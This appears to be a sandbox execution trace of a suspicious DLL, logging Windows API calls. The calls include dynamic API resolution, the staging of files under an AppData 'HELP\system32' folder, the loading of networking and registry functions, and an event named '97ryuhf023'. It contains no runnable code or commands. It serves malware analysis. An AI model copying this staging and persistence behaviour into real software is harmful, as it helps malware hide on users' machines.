0x0 [0031.638] SetLastError (dwErrCode=0x0) [0031.638] GetLastError () returned 0x0 [0031.638] SetLastError (dwErrCode=0x0) [0031.638] GetLastError () returned 0x0 [0031.639] SetLastError (dwErrCode=0x0) [0031.639] GetLastError () returned 0x0 [0031.639] SetLastError (dwErrCode=0x0) [0031.639] GetLastError () returned 0x0 [0031.639] SetLastError (dwErrCode=0x0) [0031.639] GetLastError () returned 0x0 [0031.639] SetLastError (dwErrCode=0x0) [0031.639] GetLastError () returned 0x0 [0031.639] SetLastError (dwErrCode=0x0) [0031.639] GetLastError () returned 0x0 [0031.639] SetLastError (dwErrCode=0x0) [0031.639] GetLastError () returned 0x0 [0031.639] SetLastError (dwErrCode=0x0) [0031.639] GetLastError () returned 0x0 [0031.639] SetLastError (dwErrCode=0x0) [0031.639] GetLastError () returned 0x0 [0031.639] SetLastError (dwErrCode=0x0) [0031.639] GetLastError () returned 0x0 [0031.640] SetLastError (dwErrCode=0x0) [0031.640] GetLastError () returned 0x0 [0031.640] SetLastError (dwErrCode=0x0) [0031.640] GetLastError () returned 0x0 [0031.640] SetLastError (dwErrCode=0x0) [0031.640] GetLastError () returned 0x0 [0031.640] SetLastError (dwErrCode=0x0) [0031.640] GetLastError () returned 0x0 [0031.640] SetLastError (dwErrCode=0x0) [0031.640] GetLastError () returned 0x0 [0031.640] SetLastError (dwErrCode=0x0) [0031.640] GetLastError () returned 0x0 [0031.640] SetLastError (dwErrCode=0x0) [0031.640] GetLastError () returned 0x0 [0031.640] SetLastError (dwErrCode=0x0) [0031.640] GetLastError () returned 0x0 [0031.640] SetLastError (dwErrCode=0x0) [0031.640] GetLastError () returned 0x0 [0031.640] SetLastError (dwErrCode=0x0) [0031.641] GetLastError () returned 0x0 [0031.641] SetLastError (dwErrCode=0x0) [0031.641] GetLastError () returned 0x0 [0031.641] SetLastError (dwErrCode=0x0) [0031.641] GetLastError () returned 0x0 [0031.641] SetLastError (dwErrCode=0x0) [0031.641] GetLastError () returned 0x0 [0031.641] SetLastError (dwErrCode=0x0) [0031.641] GetLastError () returned 0x0 [0031.641] SetLastError (dwErrCode=0x0) [0031.641] GetLastError () returned 0x0 [0031.641] SetLastError (dwErrCode=0x0) [0031.641] GetLastError () returned 0x0 [0031.641] SetLastError (dwErrCode=0x0) [0031.641] GetLastError () returned 0x0 [0031.641] SetLastError (dwErrCode=0x0) [0031.641] GetLastError () returned 0x0 [0031.641] SetLastError (dwErrCode=0x0) [0031.641] GetLastError () returned 0x0 [0031.642] SetLastError (dwErrCode=0x0) [0031.642] GetLastError () returned 0x0 [0031.642] SetLastError (dwErrCode=0x0) [0031.642] GetLastError () returned 0x0 [0031.642] SetLastError (dwErrCode=0x0) [0031.642] GetLastError () returned 0x0 [0031.642] SetLastError (dwErrCode=0x0) [0031.642] GetLastError () returned 0x0 [0031.642] SetLastError (dwErrCode=0x0) [0031.642] GetLastError () returned 0x0 [0031.642] SetLastError (dwErrCode=0x0) [0031.642] GetLastError () returned 0x0 [0031.642] SetLastError (dwErrCode=0x0) [0031.642] GetLastError () returned 0x0 [0031.642] SetLastError (dwErrCode=0x0) [0031.642] GetLastError () returned 0x0 [0031.642] SetLastError (dwErrCode=0x0) [0031.642] GetLastError () returned 0x0 [0031.642] SetLastError (dwErrCode=0x0) [0031.643] GetLastError () returned 0x0 [0031.643] SetLastError (dwErrCode=0x0) [0031.643] GetLastError () returned 0x0 [0031.643] SetLastError (dwErrCode=0x0) [0031.643] GetLastError () returned 0x0 [0031.643] SetLastError (dwErrCode=0x0) [0031.643] GetLastError () returned 0x0 [0031.643] SetLastError (dwErrCode=0x0) [0031.643] GetLastError () returned 0x0 [0031.643] SetLastError (dwErrCode=0x0) [0031.643] GetLastError () returned 0x0 [0031.643] SetLastError (dwErrCode=0x0) [0031.643] GetLastError () returned 0x0 [0031.643] SetLastError (dwErrCode=0x0) [0031.643] GetLastError () returned 0x0 [0031.643] SetLastError (dwErrCode=0x0) [0031.643] GetLastError () returned 0x0 [0031.643] SetLastError (dwErrCode=0x0) [0031.643] GetLastError () returned 0x0 [0031.644] SetLastError (dwErrCode=0x0) [0031.644] GetLastError () returned 0x0 [0031.644] SetLastError (dwErrCode=0x0) [0031.644] GetLastError () returned 0x0 [0031.644] SetLastError (dwErrCode=0x0) [0031.644] GetLastError () returned 0x0 [0031.644] SetLastError (dwErrCode=0x0) [0031.644] GetLastError () returned 0x0 [0031.644] SetLastError (dwErrCode=0x0) [0031.644] GetLastError () returned 0x0 [0031.644] SetLastError (dwErrCode=0x0) [0031.644] GetLastError () returned 0x0 [0031.644] SetLastError (dwErrCode=0x0) [0031.644] GetLastError () returned 0x0 [0031.644] SetLastError (dwErrCode=0x0) [0031.644] GetLastError () returned 0x0 [0031.644] SetLastError (dwErrCode=0x0) [0031.644] GetLastError () returned 0x0 [0031.644] SetLastError (dwErrCode=0x0) [0031.645] GetLastError () returned 0x0 [0031.645] SetLastError (dwErrCode=0x0) [0031.645] GetLastError () returned 0x0 [0031.645] SetLastError (dwErrCode=0x0) [0031.645] GetLastError () returned 0x0 [0031.645] SetLastError (dwErrCode=0x0) [0031.645] GetLastError () returned 0x0 [0031.645] SetLastError (dwErrCode=0x0) [0031.645] GetLastError () returned 0x0 [0031.645] SetLastError (dwErrCode=0x0) [0031.645] GetLastError () returned 0x0 [0031.645] SetLastError (dwErrCode=0x0) [0031.645] GetLastError () returned 0x0 [0031.645] SetLastError (dwErrCode=0x0) [0031.645] GetLastError () returned 0x0 [0031.645] SetLastError (dwErrCode=0x0) [0031.645] GetLastError () returned 0x0 [0031.645] SetLastError (dwErrCode=0x0) [0031.646] GetLastError () returned 0x0 [0031.646] SetLastError (dwErrCode=0x0) [0031.646] GetLastError () returned 0x0 [0031.646] SetLastError (dwErrCode=0x0) [0031.646] GetLastError () returned 0x0 [0031.646] SetLastError (dwErrCode=0x0) [0031.646] GetLastError () returned 0x0 [0031.646] SetLastError (dwErrCode=0x0) [0031.646] GetLastError () returned 0x0 [0031.646] SetLastError (dwErrCode=0x0) [0031.646] GetLastError () returned 0x0 [0031.646] SetLastError (dwErrCode=0x0) [0031.646] GetLastError () returned 0x0 [0031.646] SetLastError (dwErrCode=0x0) [0031.646] GetLastError () returned 0x0 [0031.646] SetLastError (dwErrCode=0x0) [0031.646] GetLastError () returned 0x0 [0031.646] SetLastError (dwErrCode=0x0) [0031.647] GetLastError () returned 0x0 [0031.647] SetLastError (dwErrCode=0x0) [0031.647] GetLastError () returned 0x0 [0031.647] SetLastError (dwErrCode=0x0) [0031.647] GetLastError () returned 0x0 [0031.647] SetLastError (dwErrCode=0x0) [0031.647] GetLastError () returned 0x0 [0031.647] SetLastError (dwErrCode=0x0) [0031.647] GetLastError () returned 0x0 [0031.647] SetLastError (dwErrCode=0x0) [0031.647] GetLastError () returned 0x0 [0031.647] SetLastError (dwErrCode=0x0) [0031.647] GetLastError () returned 0x0 [0031.647] SetLastError (dwErrCode=0x0) [0031.647] GetLastError () returned 0x0 [0031.647] SetLastError (dwErrCode=0x0) [0031.647] GetLastError () returned 0x0 [0031.647] SetLastError (dwErrCode=0x0) [0031.647] GetLastError () returned 0x0 [0031.648] SetLastError (dwErrCode=0x0) [0031.648] GetLastError () returned 0x0 [0031.648] SetLastError (dwErrCode=0x0) [0031.648] GetLastError () returned 0x0 [0031.648] SetLastError (dwErrCode=0x0) [0031.648] GetLastError () returned 0x0 [0031.648] SetLastError (dwErrCode=0x0) [0031.648] GetLastError () returned 0x0 [0031.648] SetLastError (dwErrCode=0x0) [0031.648] GetLastError () returned 0x0 [0031.648] SetLastError (dwErrCode=0x0) [0031.648] GetLastError () returned 0x0 [0031.648] SetLastError (dwErrCode=0x0) [0031.648] GetLastError () returned 0x0 [0031.648] SetLastError (dwErrCode=0x0) [0031.648] GetLastError () returned 0x0 [0031.648] SetLastError (dwErrCode=0x0) [0031.648] GetLastError () returned 0x0 [0031.648] SetLastError (dwErrCode=0x0) [0031.648] GetLastError () returned 0x0 [0031.649] SetLastError (dwErrCode=0x0) [0031.649] GetLastError () returned 0x0 [0031.649] SetLastError (dwErrCode=0x0) [0031.649] GetLastError () returned 0x0 [0031.649] SetLastError (dwErrCode=0x0) [0031.649] GetLastError () returned 0x0 [0031.649] SetLastError (dwErrCode=0x0) [0031.649] GetLastError () returned 0x0 [0031.649] SetLastError (dwErrCode=0x0) [0031.649] GetLastError () returned 0x0 [0031.649] SetLastError (dwErrCode=0x0) [0031.649] GetLastError () returned 0x0 [0031.649] SetLastError (dwErrCode=0x0) [0031.649] GetLastError () returned 0x0 [0031.649] SetLastError (dwErrCode=0x0) [0031.649] GetLastError () returned 0x0 [0031.649] SetLastError (dwErrCode=0x0) [0031.649] GetLastError () returned 0x0 [0031.650] SetLastError (dwErrCode=0x0) [0031.650] GetLastError () returned 0x0 [0031.650] SetLastError (dwErrCode=0x0) [0031.650] GetLastError () returned 0x0 [0031.650] SetLastError (dwErrCode=0x0) [0031.650] GetLastError () returned 0x0 [0031.650] SetLastError (dwErrCode=0x0) [0031.650] GetLastError () returned 0x0 [0031.650] SetLastError (dwErrCode=0x0) [0031.650] GetLastError () returned 0x0 [0031.650] SetLastError (dwErrCode=0x0) [0031.650] GetLastError () returned 0x0 [0031.650] SetLastError (dwErrCode=0x0) [0031.650] GetLastError () returned 0x0 [0031.650] SetLastError (dwErrCode=0x0) [0031.650] GetLastError () returned 0x0 [0031.650] SetLastError (dwErrCode=0x0) [0031.650] GetLastError () returned 0x0 [0031.650] SetLastError (dwErrCode=0x0) [0031.650] GetLastError () returned 0x0 [0031.651] SetLastError (dwErrCode=0x0) [0031.651] GetLastError () returned 0x0 [0031.651] SetLastError (dwErrCode=0x0) [0031.651] GetLastError () returned 0x0 [0031.651] SetLastError (dwErrCode=0x0) [0031.651] GetLastError () returned 0x0 [0031.651] SetLastError (dwErrCode=0x0) [0031.651] GetLastError () returned 0x0 [0031.651] SetLastError (dwErrCode=0x0) [0031.651] GetLastError () returned 0x0 [0031.651] SetLastError (dwErrCode=0x0) [0031.651] GetLastError () returned 0x0 [0031.651] SetLastError (dwErrCode=0x0) [0031.651] GetLastError () returned 0x0 [0031.651] SetLastError (dwErrCode=0x0) [0031.652] GetLastError () returned 0x0 [0031.652] SetLastError (dwErrCode=0x0) [0031.652] GetLastError () returned 0x0 [0031.652] SetLastError (dwErrCode=0x0) [0031.652] GetLastError () returned 0x0 [0031.652] SetLastError (dwErrCode=0x0) [0031.652] GetLastError () returned 0x0 [0031.652] SetLastError (dwErrCode=0x0) [0031.652] GetLastError () returned 0x0 [0031.652] SetLastError (dwErrCode=0x0) [0031.652] GetLastError () returned 0x0 [0031.652] SetLastError (dwErrCode=0x0) [0031.652] GetLastError () returned 0x0 [0031.652] SetLastError (dwErrCode=0x0) [0031.652] GetLastError () returned 0x0 [0031.652] SetLastError (dwErrCode=0x0) [0031.652] GetLastError () returned 0x0 [0031.652] SetLastError (dwErrCode=0x0) [0031.653] GetLastError () returned 0x0 [0031.653] SetLastError (dwErrCode=0x0) [0031.653] GetLastError () returned 0x0 [0031.653] SetLastError (dwErrCode=0x0) [0031.653] GetLastError () returned 0x0 [0031.653] SetLastError (dwErrCode=0x0) [0031.653] GetLastError () returned 0x0 [0031.653] SetLastError (dwErrCode=0x0) [0031.653] GetLastError () returned 0x0 [0031.653] SetLastError (dwErrCode=0x0) [0031.653] GetLastError () returned 0x0 [0031.653] SetLastError (dwErrCode=0x0) [0031.653] GetLastError () returned 0x0 [0031.653] SetLastError (dwErrCode=0x0) [0031.653] GetLastError () returned 0x0 [0031.653] SetLastError (dwErrCode=0x0) [0031.653] GetLastError () returned 0x0 [0031.653] SetLastError (dwErrCode=0x0) [0031.653] GetLastError () returned 0x0 [0031.654] SetLastError (dwErrCode=0x0) [0031.654] GetLastError () returned 0x0 [0031.654] SetLastError (dwErrCode=0x0) [0031.654] GetLastError () returned 0x0 [0031.654] SetLastError (dwErrCode=0x0) [0031.654] GetLastError () returned 0x0 [0031.654] SetLastError (dwErrCode=0x0) [0031.654] GetLastError () returned 0x0 [0031.654] SetLastError (dwErrCode=0x0) [0031.654] GetLastError () returned 0x0 [0031.654] SetLastError (dwErrCode=0x0) [0031.654] GetLastError () returned 0x0 [0031.654] SetLastError (dwErrCode=0x0) [0031.654] GetLastError () returned 0x0 [0031.654] SetLastError (dwErrCode=0x0) [0031.654] GetLastError () returned 0x0 [0031.654] SetLastError (dwErrCode=0x0) [0031.654] GetLastError () returned 0x0 [0031.655] SetLastError (dwErrCode=0x0) [0031.655] GetLastError () returned 0x0 [0031.655] SetLastError (dwErrCode=0x0) [0031.655] GetLastError () returned 0x0 [0031.655] SetLastError (dwErrCode=0x0) [0031.655] GetLastError () returned 0x0 [0031.655] SetLastError (dwErrCode=0x0) [0031.655] GetLastError () returned 0x0 [0031.655] SetLastError (dwErrCode=0x0) [0031.655] GetLastError () returned 0x0 [0031.655] SetLastError (dwErrCode=0x0) [0031.655] GetLastError () returned 0x0 [0031.655] SetLastError (dwErrCode=0x0) [0031.655] GetLastError () returned 0x0 [0031.655] SetLastError (dwErrCode=0x0) [0031.655] GetLastError () returned 0x0 [0031.655] SetLastError (dwErrCode=0x0) [0031.655] GetLastError () returned 0x0 [0031.655] SetLastError (dwErrCode=0x0) [0031.656] GetLastError () returned 0x0 [0031.656] SetLastError (dwErrCode=0x0) [0031.656] GetLastError () returned 0x0 [0031.656] SetLastError (dwErrCode=0x0) [0031.656] GetLastError () returned 0x0 [0031.656] SetLastError (dwErrCode=0x0) [0031.656] GetLastError () returned 0x0 [0031.656] SetLastError (dwErrCode=0x0) [0031.656] GetLastError () returned 0x0 [0031.656] SetLastError (dwErrCode=0x0) [0031.656] GetLastError () returned 0x0 [0031.656] SetLastError (dwErrCode=0x0) [0031.656] GetLastError () returned 0x0 [0031.656] SetLastError (dwErrCode=0x0) [0031.656] GetLastError () returned 0x0 [0031.656] SetLastError (dwErrCode=0x0) [0031.656] GetLastError () returned 0x0 [0031.656] SetLastError (dwErrCode=0x0) [0031.656] GetLastError () returned 0x0 [0031.657] SetLastError (dwErrCode=0x0) [0031.657] GetLastError () returned 0x0 [0031.657] SetLastError (dwErrCode=0x0) [0031.657] GetLastError () returned 0x0 [0031.657] SetLastError (dwErrCode=0x0) [0031.657] GetLastError () returned 0x0 [0031.657] SetLastError (dwErrCode=0x0) [0031.657] GetLastError () returned 0x0 [0031.657] SetLastError (dwErrCode=0x0) [0031.657] GetLastError () returned 0x0 [0031.657] SetLastError (dwErrCode=0x0) [0031.657] GetLastError () returned 0x0 [0031.657] SetLastError (dwErrCode=0x0) [0031.657] GetLastError () returned 0x0 [0031.657] SetLastError (dwErrCode=0x0) [0031.658] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0031.658] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0031.658] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0031.660] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f7e0 | out: lpSystemTimeAsFileTime=0x24f7e0*(dwLowDateTime=0xe097d3d0, dwHighDateTime=0x1d3dfba)) [0031.660] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f718, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.660] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24f600, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.660] GetLastError () returned 0x0 [0031.660] GetLastError () returned 0x0 [0031.660] GetLastError () returned 0x0 [0031.660] GetLastError () returned 0x0 [0031.660] GetLastError () returned 0x0 [0031.660] GetLastError () returned 0x0 [0031.660] GetLastError () returned 0x0 [0031.660] GetLastError () returned 0x0 [0031.660] GetLastError () returned 0x0 [0031.661] GetLastError () returned 0x0 [0031.661] GetLastError () returned 0x0 [0031.661] GetLastError () returned 0x0 [0031.661] GetLastError () returned 0x0 [0031.661] GetLastError () returned 0x0 [0031.661] GetLastError () returned 0x0 [0031.661] GetLastError () returned 0x0 [0031.661] GetLastError () returned 0x0 [0031.661] GetLastError () returned 0x0 [0031.661] GetLastError () returned 0x0 [0031.661] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.661] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0031.661] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.661] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.661] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.661] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.661] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0031.662] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0031.662] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0031.662] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0031.662] GetLastError () returned 0xb7 [0031.662] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0031.662] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0031.662] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0031.662] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0031.662] wsprintfA (in: param_1=0x24f480, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.662] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0031.662] wsprintfA (in: param_1=0x24f37c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0031.662] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.663] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0031.663] CloseHandle (hObject=0x74) returned 1 [0031.663] GetLastError () returned 0x0 [0031.663] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0031.663] GetLastError () returned 0x0 [0031.663] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0031.663] GetSystemDirectoryA (in: lpBuffer=0x24f480, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0031.663] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0031.664] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0031.664] CloseHandle (hObject=0x74) returned 1 [0031.664] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.664] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.664] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0031.666] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0031.666] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0031.666] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0031.666] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0031.666] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0031.666] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0031.666] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0031.666] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0031.667] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0031.667] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0031.667] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0031.667] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0031.667] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0031.685] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0031.685] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0031.686] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0031.687] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0031.688] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0031.688] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0031.688] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0031.688] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0031.688] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0031.688] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0031.688] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0031.688] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0031.688] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0031.688] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0031.688] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0031.688] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0031.689] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0031.689] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0031.689] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0031.689] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0031.689] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0031.689] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0031.689] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0031.689] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0031.689] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0031.689] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.689] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.689] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.690] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0031.698] HeapDestroy (hHeap=0x760000) returned 1 Process: id = "13" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f800" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"0\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" 